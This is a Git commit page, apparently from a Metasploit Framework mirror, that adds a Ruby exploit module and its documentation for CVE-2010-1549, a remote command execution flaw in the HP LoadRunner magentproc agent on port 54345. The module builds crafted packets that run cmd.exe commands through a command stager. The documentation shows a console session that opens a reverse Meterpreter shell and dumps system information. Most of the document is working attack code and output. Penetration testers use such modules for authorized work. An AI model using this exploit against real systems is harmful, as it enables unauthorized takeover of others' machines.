dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

land #9191 an exploit against HP LoadRunner magentproc

This commit is contained in:
h00die 2017-12-29 16:35:43 -05:00
parent bb97467b31 4dacc70b9a
commit 3516305517
No known key found for this signature in database
GPG Key ID: C5A9D25D1457C971
2 changed files with 162 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md Normal file
View File

@ -0,0 +1,63 @@
HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
The service is vulnerable provided the Secure Channel feature is disabled (default).
During testing, additional versions were verified to be vulnerable. The following list documents them:
- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
## Vulnerable Application
HP LoadRunner 9.50 or below, or a version documented above.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
4. Do: ```set RHOST [ip]```
5. Do: ```run```
6. You should get a shell.
## Scenarios
### Win7 OS with HP LoadRunner 12.53 Community Edition
```
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
RHOST => victim
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] victim:54345 - Sending payload...
[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
...snip...
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
[*] Sending stage (179267 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
meterpreter > sysinfo
Computer : TARGET
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_AU
Domain : DOMAIN
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
Background session 1? [y/N]
```

99
modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb Normal file
View File

@ -0,0 +1,99 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
'Description' => %q{
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
also most likely vulneable if the (non-default) SSL option is turned off.
By sending a specially crafted packet, an attacker can execute commands remotely.
The service is vulnerable provided the Secure Channel feature is disabled (default).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Original discovery # From Tenable Network Security
'aushack' # metasploit module
],
'References' =>
[
['CVE', '2010-1549'],
['ZDI', '10-080'],
['BID', '39965'],
['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
],
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
'Platform' => 'win',
'Targets' =>
[
# Note: software reportedly supports Linux - may also be vulnerable.
['Windows (Dropper)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
],
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => 'May 06 2010',
'DefaultTarget' => 0))
register_options([Opt::RPORT(54345)])
end
def autofilter
true
end
def execute_command(cmd, _opts = {})
guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
randstr = Rex::Text.rand_text_alpha(16)
server_name = Rex::Text.rand_text_alpha(7)
server_ip = datastore['LHOST']
server_port = Rex::Text.rand_text_numeric(4)
# If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
cmd1 = "C:\\Windows\\system32\\cmd.exe"
cmd2 = "/C \"#{cmd}\""
pkt1 = [0x19].pack('N') + guid + '0'
pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
pkt2 << [0x7530].pack('N')
pkt3 = [4 + pkt2.length].pack('N') + pkt2
pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
pkt5 = [pkt4.length].pack('N') + pkt4
pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
pkt7 = [4 + pkt6.length].pack('N') + pkt6
pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
pkt9 = [pkt8.length].pack('N') + pkt8
sploit = pkt1 + pkt5 + pkt9
connect
sock.put(sploit)
disconnect
end
def exploit
print_status('Sending payload...')
execute_cmdstager(linemax: 1500)
end
end